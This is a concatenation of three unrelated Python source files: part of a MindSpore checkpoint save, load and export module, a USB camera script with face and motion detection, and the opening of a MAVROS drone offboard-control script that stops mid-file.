"Float16": np.float16, "Float32": np.float32, "Float64": np.float64, "Bool": np.bool_}
_ckpt_mutex = Lock()
SLICE_SIZE = 512 * 1024 * 1024
def _set_pb_env():
"""Set env variable `PROTOCOL_BUFFERS` to prevent memory overflow."""
if os.getenv("PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION") == "cpp":
logger.warning("Current env variable `PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION=cpp`,\
When the parameter is too large, it may cause memory limit error.\
This can be solved by set env `PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION=python`.")
else:
os.environ["PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION"] = "python"
logger.debug("Set the `PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION=python`.")
def _special_process_par(par, new_par):
"""
Processes the special condition.
    Like (12,2048,1,1)->(12,2048), this case is caused by GE's 4-dimensional tensors.
"""
par_shape_len = len(par.data.shape)
new_par_shape_len = len(new_par.data.shape)
delta_len = new_par_shape_len - par_shape_len
delta_i = 0
for delta_i in range(delta_len):
if new_par.data.shape[par_shape_len + delta_i] != 1:
break
if delta_i == delta_len - 1:
new_val = new_par.data.asnumpy()
new_val = new_val.reshape(par.data.shape)
par.set_data(Tensor(new_val, par.data.dtype))
return True
return False
def _update_param(param, new_param):
"""Updates param's data from new_param's data."""
if isinstance(param.data, Tensor) and isinstance(new_param.data, Tensor):
if param.data.dtype != new_param.data.dtype:
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} type({}) different from parameter_dict's({})"
.format(param.name, param.data.dtype, new_param.data.dtype))
raise RuntimeError(msg)
if param.data.shape != new_param.data.shape:
if not _special_process_par(param, new_param):
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} shape({}) different from parameter_dict's({})"
.format(param.name, param.data.shape, new_param.data.shape))
raise RuntimeError(msg)
return
param.set_data(new_param.data)
return
if isinstance(param.data, Tensor) and not isinstance(new_param.data, Tensor):
if param.data.shape != (1,) and param.data.shape != ():
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} shape({}) is not (1,), inconsitent with parameter_dict's(scalar)."
.format(param.name, param.data.shape))
raise RuntimeError(msg)
param.set_data(initializer(new_param.data, param.data.shape, param.data.dtype))
elif isinstance(new_param.data, Tensor) and not isinstance(param.data, Tensor):
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} type({}) different from parameter_dict's({})"
.format(param.name, type(param.data), type(new_param.data)))
raise RuntimeError(msg)
else:
param.set_data(type(param.data)(new_param.data))
def _exec_save(ckpt_file_name, data_list):
"""Execute save checkpoint into file process."""
try:
with _ckpt_mutex:
if os.path.exists(ckpt_file_name):
os.remove(ckpt_file_name)
with open(ckpt_file_name, "ab") as f:
for name, value in data_list.items():
data_size = value[2].nbytes
if data_size > SLICE_SIZE:
slice_count = math.ceil(data_size / SLICE_SIZE)
param_slice_list = np.array_split(value[2], slice_count)
else:
param_slice_list = [value[2]]
for param_slice in param_slice_list:
checkpoint_list = Checkpoint()
param_value = checkpoint_list.value.add()
param_value.tag = name
param_tensor = param_value.tensor
param_tensor.dims.extend(value[0])
param_tensor.tensor_type = value[1]
param_tensor.tensor_content = param_slice.tostring()
f.write(checkpoint_list.SerializeToString())
os.chmod(ckpt_file_name, stat.S_IRUSR)
except BaseException as e:
logger.error("Failed to save the checkpoint file %s.", ckpt_file_name)
raise e
def save_checkpoint(save_obj, ckpt_file_name, integrated_save=True, async_save=False):
"""
Saves checkpoint info to a specified file.
Args:
save_obj (nn.Cell or list): The cell object or data list(each element is a dictionary, like
[{"name": param_name, "data": param_data},...], the type of param_name would
be string, and the type of param_data would be parameter or tensor).
ckpt_file_name (str): Checkpoint file name. If the file name already exists, it will be overwritten.
integrated_save (bool): Whether to integrated save in automatic model parallel scene. Default: True
async_save (bool): Whether asynchronous execution saves the checkpoint to a file. Default: False
Raises:
        TypeError: If the parameter save_obj is not nn.Cell or list type, or if the parameters integrated_save
            and async_save are not bool type.
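    Examples:
        A minimal sketch (the Dense layer and file name are illustrative only):
        >>> import mindspore.nn as nn
        >>> net = nn.Dense(3, 4)
        >>> save_checkpoint(net, "./dense.ckpt")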
"""
if not isinstance(save_obj, nn.Cell) and not isinstance(save_obj, list):
raise TypeError("The parameter save_obj should be nn.Cell or list, but got {}".format(type(save_obj)))
if not isinstance(integrated_save, bool):
raise TypeError("The parameter integrated_save should be bool, but got {}".format(type(integrated_save)))
if not isinstance(async_save, bool):
raise TypeError("The parameter async_save should be bool, but got {}".format(type(async_save)))
logger.info("Execute save checkpoint process.")
if isinstance(save_obj, nn.Cell):
save_obj.init_parameters_data()
param_dict = {}
for _, param in save_obj.parameters_and_names():
param_dict[param.name] = param
param_list = []
for (key, value) in param_dict.items():
each_param = {"name": key}
param_data = Tensor(value.data)
            # in the automatic model parallel scenario, some parameters are split
            # across the devices and should be combined before saving
if integrated_save and key in save_obj.parameter_layout_dict:
param_data = _get_merged_param_data(save_obj, key, param_data)
each_param["data"] = param_data
param_list.append(each_param)
save_obj = param_list
data_list = {}
with _ckpt_mutex:
for param in save_obj:
key = param["name"]
data_list[key] = []
if isinstance(param["data"], Parameter):
param["data"].init_data()
dims = []
if param['data'].shape == ():
dims.append(0)
else:
for dim in param['data'].shape:
dims.append(dim)
data_list[key].append(dims)
tensor_type = str(param["data"].dtype)
data_list[key].append(tensor_type)
data = param["data"].asnumpy().reshape(-1)
data_list[key].append(data)
if async_save:
thr = Thread(target=_exec_save, args=(ckpt_file_name, data_list), name="asyn_save_ckpt")
thr.start()
else:
_exec_save(ckpt_file_name, data_list)
logger.info("Save checkpoint process finish.")
def load_checkpoint(ckpt_file_name, net=None):
"""
Loads checkpoint info from a specified file.
Args:
ckpt_file_name (str): Checkpoint file name.
net (Cell): Cell network. Default: None
Returns:
Dict, key is parameter name, value is a Parameter.
Raises:
ValueError: Checkpoint file is incorrect.
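    Examples:
        A minimal sketch ("./dense.ckpt" is a placeholder path):
        >>> param_dict = load_checkpoint("./dense.ckpt")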
"""
if not isinstance(ckpt_file_name, str):
raise ValueError("The ckpt_file_name must be string.")
if not os.path.exists(ckpt_file_name):
raise ValueError("The checkpoint file is not exist.")
if ckpt_file_name[-5:] != ".ckpt":
raise ValueError("Please input the correct checkpoint file name.")
if os.path.getsize(ckpt_file_name) == 0:
raise ValueError("The checkpoint file may be empty, please make sure enter the correct file name.")
logger.info("Execute load checkpoint process.")
checkpoint_list = Checkpoint()
try:
with open(ckpt_file_name, "rb") as f:
pb_content = f.read()
checkpoint_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the checkpoint file `%s`, please check the correct of the file.", ckpt_file_name)
raise ValueError(e.__str__())
parameter_dict = {}
try:
element_id = 0
param_data_list = []
for element in checkpoint_list.value:
data = element.tensor.tensor_content
data_type = element.tensor.tensor_type
np_type = tensor_to_np_type[data_type]
ms_type = tensor_to_ms_type[data_type]
element_data = np.frombuffer(data, np_type)
param_data_list.append(element_data)
if (element_id == len(checkpoint_list.value) - 1) or \
(element.tag != checkpoint_list.value[element_id + 1].tag):
param_data = np.concatenate((param_data_list), axis=0)
param_data_list.clear()
dims = element.tensor.dims
if dims == [0]:
if 'Float' in data_type:
param_data = float(param_data[0])
elif 'Int' in data_type:
param_data = int(param_data[0])
parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
elif dims == [1]:
parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
else:
param_dim = []
for dim in dims:
param_dim.append(dim)
param_value = param_data.reshape(param_dim)
parameter_dict[element.tag] = Parameter(Tensor(param_value, ms_type), name=element.tag)
element_id += 1
logger.info("Load checkpoint process finish.")
except BaseException as e:
logger.error("Failed to load the checkpoint file `%s`.", ckpt_file_name)
raise RuntimeError(e.__str__())
if net is not None:
load_param_into_net(net, parameter_dict)
return parameter_dict
def load_param_into_net(net, parameter_dict):
"""
Loads parameters into network.
Args:
net (Cell): Cell network.
parameter_dict (dict): Parameter dictionary.
Raises:
TypeError: Argument is not a Cell, or parameter_dict is not a Parameter dictionary.
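    Examples:
        A minimal sketch reusing the placeholder checkpoint from load_checkpoint:
        >>> import mindspore.nn as nn
        >>> net = nn.Dense(3, 4)
        >>> param_dict = load_checkpoint("./dense.ckpt")
        >>> param_not_load = load_param_into_net(net, param_dict)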
"""
if not isinstance(net, nn.Cell):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument net should be a Cell, but got {}.".format(type(net)))
raise TypeError(msg)
if not isinstance(parameter_dict, dict):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument parameter_dict should be a dict, but got {}.".format(type(parameter_dict)))
raise TypeError(msg)
logger.info("Execute load parameter into net process.")
net.init_parameters_data()
param_not_load = []
for _, param in net.parameters_and_names():
if param.name in parameter_dict:
new_param = parameter_dict[param.name]
if not isinstance(new_param, Parameter):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument parameter_dict element should be a Parameter, but got {}.".format(type(new_param)))
raise TypeError(msg)
_update_param(param, new_param)
else:
param_not_load.append(param.name)
if param_not_load:
_load_dismatch_prefix_params(net, parameter_dict, param_not_load)
logger.debug("Params not matched(in net but not in parameter_dict):")
for param_name in param_not_load:
logger.debug("%s", param_name)
logger.info("Load parameter into net finish, {} parameters has not been loaded.".format(len(param_not_load)))
return param_not_load
def _load_dismatch_prefix_params(net, parameter_dict, param_not_load):
"""When some net parameter did not load, try to continue load."""
prefix_name = ""
longest_name = param_not_load[0]
while prefix_name != longest_name and param_not_load:
logger.debug("Count: {} parameters has not been loaded, try to load continue.".format(len(param_not_load)))
prefix_name = longest_name
for net_param_name in param_not_load:
for dict_name in parameter_dict:
if dict_name.endswith(net_param_name):
prefix_name = dict_name[:-len(net_param_name)]
break
if prefix_name != longest_name:
break
if prefix_name != longest_name:
logger.warning("Remove parameter prefix name: {}, continue to load.".format(prefix_name))
for _, param in net.parameters_and_names():
new_param_name = prefix_name + param.name
if param.name in param_not_load and new_param_name in parameter_dict:
new_param = parameter_dict[new_param_name]
_update_param(param, new_param)
param_not_load.remove(param.name)
def _save_graph(network, file_name):
"""
Saves the graph of network to a file.
Args:
network (Cell): Obtain a pipeline through network for saving graph.
file_name (str): Graph file name into which the graph will be saved.
"""
logger.info("Execute save the graph process.")
graph_proto = network.get_func_graph_proto()
if graph_proto:
with open(file_name, "wb") as f:
f.write(graph_proto)
os.chmod(file_name, stat.S_IRUSR)
def _get_merged_param_data(net, param_name, param_data):
"""
Gets the merged data(tensor) from tensor slice, by device arrangement and tensor map.
Args:
net (Cell): MindSpore network.
param_name(str): The parameter name, which to be combined.
        param_data (Tensor): The parameter data on the local device;
            it is a slice of the whole parameter data.
Returns:
Tensor, the combined tensor which with the whole data value.
"""
layout = net.parameter_layout_dict[param_name]
if len(layout) < 6:
logger.info("layout dict does not contain the key %s", param_name)
return param_data
dev_mat = layout[0]
tensor_map = layout[1]
field_size = layout[3]
uniform_split = layout[4]
opt_shard_group = layout[5]
if uniform_split == 0:
raise RuntimeError("Save checkpoint only support uniform split tensor now.")
from mindspore.parallel._cell_wrapper import get_allgather_cell
from mindspore.parallel._tensor import _reshape_param_data, _reshape_param_data_with_weight
# while any dim is not equal to -1, means param is split and needs to be merged
# pipeline parallel need to be supported here later
for dim in tensor_map:
if dim != -1 or opt_shard_group:
allgather_net = get_allgather_cell(opt_shard_group)
param_data = allgather_net(param_data)
if field_size:
return _reshape_param_data_with_weight(param_data, dev_mat, field_size)
return _reshape_param_data(param_data, dev_mat, tensor_map)
return param_data
def _fill_param_into_net(net, parameter_list):
"""
Fills parameter_list into net.
Args:
net (Cell): train network.
parameter_list (list): parameters list from ge callback.
"""
parameter_dict = {}
for each_param in parameter_list:
param_name = each_param["name"]
if isinstance(each_param["data"], Parameter):
each_param["data"].init_data()
np_val = each_param["data"].asnumpy()
if np_val.shape == (1,):
parameter_dict[param_name] = Parameter(np_val, name=param_name)
elif np_val.shape == ():
parameter_dict[param_name] = Parameter(Tensor(np_val.tolist(), mstype.pytype_to_dtype(np_val.dtype)),
name=param_name)
else:
parameter_dict[param_name] = Parameter(Tensor(np_val), name=param_name)
load_param_into_net(net, parameter_dict)
def export(net, *inputs, file_name, file_format='AIR', **kwargs):
"""
Export the MindSpore prediction model to a file in the specified format.
Args:
net (Cell): MindSpore network.
inputs (Tensor): Inputs of the `net`.
file_name (str): File name of the model to be exported.
file_format (str): MindSpore currently supports 'AIR', 'ONNX' and 'MINDIR' format for exported model.
            - AIR: Ascend Intermediate Representation. An intermediate representation format of Ascend models.
Recommended suffix for output file is '.air'.
- ONNX: Open Neural Network eXchange. An open format built to represent machine learning models.
Recommended suffix for output file is '.onnx'.
            - MINDIR: MindSpore Native Intermediate Representation for Anf. An intermediate representation format
for MindSpore models.
Recommended suffix for output file is '.mindir'.
kwargs (dict): Configuration options dictionary.
- quant_mode: The mode of quant.
- mean: Input data mean. Default: 127.5.
- std_dev: Input data variance. Default: 127.5.
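    Examples:
        A minimal sketch (network, input shape and file name are illustrative only):
        >>> import numpy as np
        >>> import mindspore.nn as nn
        >>> from mindspore import Tensor
        >>> net = nn.Dense(3, 4)
        >>> input_data = Tensor(np.ones([1, 3]).astype(np.float32))
        >>> export(net, input_data, file_name="dense", file_format="MINDIR")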
"""
logger.info("exporting model file:%s format:%s.", file_name, file_format)
check_input_data(*inputs, data_class=Tensor)
    net = _quant_export(net, *inputs, file_format=file_format, **kwargs)
_export(net, file_name, file_format, *inputs)
def _export(net, file_name, file_format, *inputs):
"""
It is an internal conversion function. Export the MindSpore prediction model to a file in the specified format.
"""
logger.info("exporting model file:%s format:%s.", file_name, file_format)
check_input_data(*inputs, data_class=Tensor)
if file_format == 'GEIR':
logger.warning(f"Format 'GEIR' is deprecated, it would be removed in future release, use 'AIR' instead.")
file_format = 'AIR'
supported_formats = ['AIR', 'ONNX', 'MINDIR']
if file_format not in supported_formats:
raise ValueError(f'Illegal file format {file_format}, it must be one of {supported_formats}')
# When dumping ONNX file, switch network mode to infer when it is training(NOTE: ONNX only designed for prediction)
is_dump_onnx_in_training = net.training and file_format == 'ONNX'
if is_dump_onnx_in_training:
net.set_train(mode=False)
# export model
net.init_parameters_data()
if file_format == 'AIR':
phase_name = 'export.air'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name)
_executor.export(file_name, graph_id)
elif file_format == 'ONNX': # file_format is 'ONNX'
phase_name = 'export.onnx'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name, do_convert=False)
onnx_stream = _executor._get_func_graph_proto(graph_id)
with open(file_name, 'wb') as f:
os.chmod(file_name, stat.S_IWUSR | stat.S_IRUSR)
f.write(onnx_stream)
elif file_format == 'MINDIR': # file_format is 'MINDIR'
phase_name = 'export.mindir'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name, do_convert=False)
onnx_stream = _executor._get_func_graph_proto(graph_id, 'mind_ir')
with open(file_name, 'wb') as f:
os.chmod(file_name, stat.S_IWUSR | stat.S_IRUSR)
f.write(onnx_stream)
# restore network training mode
if is_dump_onnx_in_training:
net.set_train(mode=True)
def _quant_export(network, *inputs, file_format='AIR', **kwargs):
"""
Exports MindSpore quantization predict model to deploy with AIR and MINDIR.
"""
if not kwargs.get('quant_mode', None):
return network
supported_device = ["Ascend", "GPU"]
supported_formats = ['AIR', 'MINDIR']
quant_mode_formats = ['AUTO', 'MANUAL']
mean = kwargs['mean'] if kwargs.get('mean', None) else 127.5
std_dev = kwargs['std_dev'] if kwargs.get('std_dev', None) else 127.5
quant_mode = kwargs['quant_mode']
if quant_mode not in quant_mode_formats:
        raise KeyError(f"Unsupported quant_mode '{quant_mode}', please choose one of {quant_mode_formats}.")
mean = Validator.check_type("mean", mean, (int, float))
std_dev = Validator.check_type("std_dev", std_dev, (int, float))
if context.get_context('device_target') not in supported_device:
raise KeyError("Unsupported {} device target.".format(context.get_context('device_target')))
if file_format not in supported_formats:
raise ValueError('Illegal file format {}.'.format(file_format))
network.set_train(False)
if file_format == "MINDIR":
if quant_mode == 'MANUAL':
exporter = quant.ExportManualQuantNetwork(network, mean, std_dev, *inputs, is_mindir=True)
else:
exporter = quant.ExportToQuantInferNetwork(network, mean, std_dev, *inputs, is_mindir=True)
else:
if quant_mode == 'MANUAL':
exporter = quant.ExportManualQuantNetwork(network, mean, std_dev, *inputs)
else:
exporter = quant.ExportToQuantInferNetwork(network, mean, std_dev, *inputs)
deploy_net = exporter.run()
return deploy_net
def parse_print(print_file_name):
"""
Loads Print data from a specified file.
Args:
print_file_name (str): The file name of saved print data.
Returns:
List, element of list is Tensor.
Raises:
        ValueError: The print file may be empty, please make sure you entered the correct file name.
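    Examples:
        A minimal sketch ("./print_output.pb" is a placeholder path for data saved
        by the Print operator):
        >>> tensor_list = parse_print("./print_output.pb")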
"""
print_file_path = os.path.realpath(print_file_name)
if os.path.getsize(print_file_path) == 0:
raise ValueError("The print file may be empty, please make sure enter the correct file name.")
logger.info("Execute load print process.")
print_list = Print()
try:
with open(print_file_path, "rb") as f:
pb_content = f.read()
print_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the print file %s, please check the correct of the file.", print_file_name)
raise ValueError(e.__str__())
tensor_list = []
try:
for print_ in print_list.value:
# String type
if print_.HasField("desc"):
tensor_list.append(print_.desc)
elif print_.HasField("tensor"):
dims = print_.tensor.dims
data_type = print_.tensor.tensor_type
data = print_.tensor.tensor_content
np_type = tensor_to_np_type[data_type]
param_data = np.fromstring(data, np_type)
ms_type = tensor_to_ms_type[data_type]
param_dim = []
for dim in dims:
param_dim.append(dim)
if param_dim:
param_value = param_data.reshape(param_dim)
tensor_list.append(Tensor(param_value, ms_type))
                # Scalar type
else:
data_type_ = data_type.lower()
if 'float' in data_type_:
param_data = float(param_data[0])
elif 'int' in data_type_:
param_data = int(param_data[0])
elif 'bool' in data_type_:
param_data = bool(param_data[0])
tensor_list.append(Tensor(param_data, ms_type))
except BaseException as e:
logger.error("Failed to load the print file %s.", print_list)
raise RuntimeError(e.__str__())
return tensor_list
def _merge_param_with_strategy(sliced_data, parameter_name, strategy, is_even):
"""
Merge data slices to one tensor with whole data when strategy is not None.
Args:
sliced_data (list[numpy.ndarray]): Data slices in order of rank_id.
parameter_name (str): Name of parameter.
strategy (dict): Parameter slice strategy.
is_even (bool): Slice manner that True represents slicing evenly and False represents slicing unevenly.
Returns:
Tensor, the merged Tensor which has the whole data.
Raises:
ValueError: Failed to merge.
"""
layout = strategy.get(parameter_name)
try:
dev_mat = list(layout.dev_matrix[0].dim)
tensor_map = list(layout.tensor_map[0].dim)
param_split_shape = list(layout.param_split_shape[0].dim)
field_size = int(layout.field)
except BaseException as e:
raise ValueError(f"{e.__str__()}. please make sure that strategy matches the node_strategy.proto.")
device_count = 1
for dim in dev_mat:
device_count *= dim
if len(sliced_data) != device_count:
raise ValueError(f"The sliced_parameters length should be equal to device_count. "
f"the sliced_parameters length is {len(sliced_data)} but device_count is {device_count}.")
merged_tensor = None
if not param_split_shape:
if not is_even:
raise ValueError("The shape of every parameter in sliced_parameters should be the same "
"when slice manner is even.")
all_gather_tensor = Tensor(np.concatenate(sliced_data))
if field_size > 0:
from mindspore.parallel._tensor import _reshape_param_data_with_weight
merged_tensor = _reshape_param_data_with_weight(all_gather_tensor, dev_mat, [field_size])
else:
from mindspore.parallel._tensor import _reshape_param_data
merged_tensor = _reshape_param_data(all_gather_tensor, dev_mat, tensor_map)
else:
from mindspore.parallel._tensor import _get_tensor_strategy, _get_tensor_slice_index
tensor_strategy = _get_tensor_strategy(dev_mat, tensor_map)
slice_count = 1
for dim in tensor_strategy:
slice_count *= dim
if len(param_split_shape) != slice_count:
raise ValueError(f"The param_split_shape length in strategy should be {slice_count}, "
f"but got {len(param_split_shape)}.")
tensor_slices_new = list(range(slice_count))
tensor_slices = sliced_data
for i in range(device_count):
slice_index = int(_get_tensor_slice_index(dev_mat, tensor_strategy, tensor_map, i))
if tensor_slices[i].shape[0] != param_split_shape[slice_index]:
raise ValueError(f"The slice {slice_index} is {param_split_shape[slice_index]} in 0 axis, "
f"but got {tensor_slices[i].shape[0]}.")
tensor_slices_new[slice_index] = np.array(tensor_slices[i])
dim_len = len(tensor_strategy)
for i in range(dim_len):
ele_count = int(len(tensor_slices_new) / tensor_strategy[dim_len - 1 - i])
tensor_slices_new_inner = []
for j in range(ele_count):
new_tensor = tensor_slices_new[j * tensor_strategy[dim_len - 1 - i]]
for l in range(j * tensor_strategy[dim_len - 1 - i] + 1,
(j + 1) * tensor_strategy[dim_len - 1 - i]):
new_tensor = np.concatenate((new_tensor, tensor_slices_new[l]), axis=dim_len - 1 - i)
tensor_slices_new_inner.insert(len(tensor_slices_new_inner), np.array(new_tensor))
tensor_slices_new = tensor_slices_new_inner
merged_tensor = Tensor(tensor_slices_new[0])
return merged_tensor
def build_searched_strategy(strategy_filename):
"""
Build strategy of every parameter in network.
Args:
strategy_filename (str): Name of strategy file.
Returns:
Dictionary, whose key is parameter name and value is slice strategy of this parameter.
Raises:
ValueError: Strategy file is incorrect.
TypeError: Strategy_filename is not str.
Examples:
>>> strategy_filename = "./strategy_train.ckpt"
>>> strategy = build_searched_strategy(strategy_filename)
"""
if not isinstance(strategy_filename, str):
raise TypeError(f"The strategy_filename should be str, but got {type(strategy_filename)}.")
if not os.path.isfile(strategy_filename):
raise ValueError(f"No such strategy file: {strategy_filename}.")
if os.path.getsize(strategy_filename) == 0:
raise ValueError("The strategy file should not be empty.")
parallel_strategy_map = ParallelStrategyMap()
with open(strategy_filename, 'rb') as f:
pb_content = f.read()
parallel_strategy_map.ParseFromString(pb_content)
layout_items = parallel_strategy_map.parallel_layout_item
if not layout_items:
raise ValueError("The strategy file has no sliced parameter.")
strategy = {}
for layout_item in layout_items:
parameter_name = layout_item.param_name
layout = layout_item.parallel_layouts
strategy[parameter_name] = layout
return strategy
def merge_sliced_parameter(sliced_parameters, strategy=None):
"""
Merge parameter slices to one whole parameter.
Args:
sliced_parameters (list[Parameter]): Parameter slices in order of rank_id.
strategy (dict): Parameter slice strategy, the default is None.
If strategy is None, just merge parameter slices in 0 axis order.
- key (str): Parameter name.
- value (<class 'node_strategy_pb2.ParallelLayouts'>): Slice strategy of this parameter.
Returns:
Parameter, the merged parameter which has the whole data.
Raises:
ValueError: Failed to merge.
TypeError: The sliced_parameters is incorrect or strategy is not dict.
KeyError: The parameter name is not in keys of strategy.
Examples:
>>> strategy = build_searched_strategy("./strategy_train.ckpt")
>>> sliced_parameters = [
>>> Parameter(Tensor(np.array([0.00023915, 0.00013939, -0.00098059])),
>>> "network.embedding_table"),
>>> Parameter(Tensor(np.array([0.00015815, 0.00015458, -0.00012125])),
>>> "network.embedding_table"),
>>> Parameter(Tensor(np.array([0.00042165, 0.00029692, -0.00007941])),
>>> "network.embedding_table"),
>>> Parameter(Tensor(np.array([0.00084451, 0.00089960, -0.00010431])),
>>> "network.embedding_table")]
>>> merged_parameter = merge_sliced_parameter(sliced_parameters, strategy)
"""
if not isinstance(sliced_parameters, list):
raise TypeError(f"The sliced_parameters should be list, but got {type(sliced_parameters)}.")
if not sliced_parameters:
raise ValueError("The sliced_parameters should not be empty.")
if strategy and not isinstance(strategy, dict):
raise TypeError(f"The strategy should be dict, but got {type(strategy)}.")
try:
parameter_name = sliced_parameters[0].name
parameter_shape = sliced_parameters[0].data.shape
parameter_shape_length = len(parameter_shape)
except BaseException as e:
raise TypeError(f"{e.__str__()}. the element in sliced_parameters should be Parameter.")
is_even = True
for index, parameter in enumerate(sliced_parameters):
if not isinstance(parameter, Parameter):
raise TypeError(f"The element in sliced_parameters should be Parameter, "
f"but got {type(parameter)} at index {index}.")
if parameter.name != parameter_name \
or len(parameter.data.shape) != parameter_shape_length \
or parameter.data.shape[1:] != parameter_shape[1:]:
raise ValueError("Please make sure that the elements in slice_parameters have the same name, "
"dimension length and shape except 0 axis")
if parameter.data.shape != parameter_shape:
is_even = False
layerwise_parallel = sliced_parameters[0].layerwise_parallel
requires_grad = sliced_parameters[0].requires_grad
sliced_data = [parameter.data.asnumpy() for parameter in sliced_parameters]
merged_parameter = None
if not strategy:
merged_tensor = Tensor(np.concatenate(sliced_data))
merged_parameter = Parameter(merged_tensor, parameter_name, requires_grad, layerwise_parallel)
else:
if parameter_name not in strategy.keys():
raise KeyError(f"The parameter name should be one key of strategy. "
f"the parameter name is {parameter_name}.")
merged_tensor = _merge_param_with_strategy(sliced_data, parameter_name, strategy, is_even)
merged_parameter = Parameter(merged_tensor, parameter_name, requires_grad, layerwise_parallel)
return merged_parameter
_set_pb_env()
|
video.py
|
#!/usr/bin/env python
import cv2
import numpy as np
import time
from threading import Thread
from queue import Queue
from datetime import datetime
from motion import Detector
def putIterationsPerSec(frame, iterations_per_sec):
"""
Add iterations per second text to lower-left corner of a frame.
"""
cv2.putText(frame, "{:.0f} iterations/sec".format(iterations_per_sec),
(10, 450), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (255, 255, 255))
return frame
class CountsPerSec:
"""
Class that tracks the number of occurrences ("counts") of an
arbitrary event and returns the frequency in occurrences
(counts) per second. The caller must increment the count.
"""
def __init__(self):
self._start_time = None
self._num_occurrences = 0
def start(self):
self._start_time = datetime.now()
return self
def increment(self):
self._num_occurrences += 1
def countsPerSec(self):
elapsed_time = (datetime.now() - self._start_time).total_seconds()
return self._num_occurrences / elapsed_time if elapsed_time > 0 else 0
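# A minimal usage sketch for CountsPerSec (the loop body is a placeholder):
#   cps = CountsPerSec().start()
#   while have_frames():
#       process_one_frame()
#       cps.increment()
#   print(cps.countsPerSec())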
class CameraReader(object):
def __init__(self, cam):
self.cam = cam
self.q = Queue(maxsize=10)
self.running = 1
def start(self):
Thread(target=self.run, args=()).start()
return self
def run(self):
while self.running:
success, image = self.cam.read()
if success:
self.q.put(image)
def stop(self):
self.running = False
class UsbCamera(object):
""" Init camera """
def __init__(self, dev=0):
# select first video device in system
self.cam = cv2.VideoCapture(dev)
# set camera resolution
self.w = 640
self.h = 480
# set crop factor
self.cam.set(cv2.CAP_PROP_FRAME_HEIGHT, self.h)
self.cam.set(cv2.CAP_PROP_FRAME_WIDTH, self.w)
# load cascade file
self.face_cascade = cv2.CascadeClassifier('face.xml')
self.running = True
self.cps = CountsPerSec().start()
self.q = Queue(maxsize=100)
self.detector = Detector()
# self.reader = CameraReader(self.cam).start()
def start(self):
Thread(target=self.run, args=()).start()
return self
def stop(self):
# self.reader.stop()
self.running = False
def run(self):
while self.running:
jpeg, image = self.get_frame()
self.q.put(jpeg)
self.cps.increment()
def set_resolution(self, new_w, new_h):
"""
functionality: Change camera resolution
        inputs: new_w, new_h - width and height of picture, must be int
        returns: None or raises an exception
"""
if isinstance(new_h, int) and isinstance(new_w, int):
# check if args are int and correct
if (new_w <= 800) and (new_h <= 600) and \
(new_w > 0) and (new_h > 0):
self.h = new_h
self.w = new_w
else:
# bad params
raise Exception('Bad resolution')
else:
# bad params
raise Exception('Not int value')
def face_recognition(self, image):
        # resize image to speed up recognition
gray = cv2.resize(image, (320, 240))
# make it grayscale
gray = cv2.cvtColor(gray, cv2.COLOR_BGR2GRAY)
# face cascade detector
faces = self.face_cascade.detectMultiScale(gray)
        # draw rect on face areas
scale = float(self.w / 320.0)
count = 0
for f in faces:
font = cv2.FONT_HERSHEY_SIMPLEX
x, y, z, t = [int(float(v) * scale) for v in f]
cv2.putText(image, str(x) + ' ' + str(y), (0, (self.h - 10 - 25 * count)), font, 1, (0, 0, 0), 2)
count += 1
cv2.rectangle(image, (x, y), (x + z, y + t), (255, 255, 255), 2)
return image
def get_frame(self, fdenable=False, motion_detection=True):
"""
        functionality: Gets a frame from the camera and tries to find faces on it
:return: byte array of jpeg encoded camera frame
"""
t0 = time.time()
success, image = self.cam.read()
# image = self.reader.q.get()
# self.reader.q.task_done()
# success = True
t1 = time.time()
if success:
# scale image
# image = cv2.resize(image, (self.w, self.h))
if fdenable:
image = self.face_recognition(image)
if motion_detection:
image = self.detector.detect(image)
else:
image = np.zeros((self.h, self.w, 3), np.uint8)
cv2.putText(image, 'No camera', (40, 60), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 1)
# encoding picture to jpeg
image = putIterationsPerSec(image, self.cps.countsPerSec())
t2 = time.time()
ret, jpeg = cv2.imencode('.jpg', image)
t3 = time.time()
# print(t1-t0, t2-t1, t3-t2)
return jpeg.tobytes(), image
if __name__=='__main__':
cam = UsbCamera(1).start()
last_image = None
while 1:
grabbed_frame = False
try:
image = cam.q.get(block=False)
last_image = image
grabbed_frame = True
        except Exception:
            if last_image is None:
                continue
        # frames in the queue are jpeg-encoded bytes, so decode before displaying
        frame = cv2.imdecode(np.frombuffer(last_image, np.uint8), cv2.IMREAD_COLOR)
        cv2.imshow("the pol", frame)
if grabbed_frame:
cam.q.task_done()
# cps.increment()
key = cv2.waitKey(1)
if key == ord('q'):
cam.stop()
break
|
mavros_offboard_posctl.py
|
#!/usr/bin/env python
import rospy
import math
import numpy as np
from geometry_msgs.msg import PoseStamped
from mavros_msgs.msg import PositionTarget
from mavros_function import MavrosFunction
from pymavlink import mavutil
from std_msgs.msg import Header
from threading import Thread
class MavrosOffboardPosctl(MavrosFunction):
"""
Tests flying in swing motion at a certain height in offboard control
by sending raw setpoints with appropriate type mask (z, vx, vy) via MAVROS.
For the test to be successful it needs to reach the target height in a certain time.
"""
def __init__(self):
rospy.init_node('offboard_control_node')
super(MavrosOffboardPosctl, self).__init__()
self.raw_point = PositionTarget()
self.radius = 0.15
self.raw_setpoint_pb = rospy.Publisher('mavros/setpoint_raw/local', PositionTarget, queue_size =10)
# send raw setpoints in separate thread to better prevent failsafe
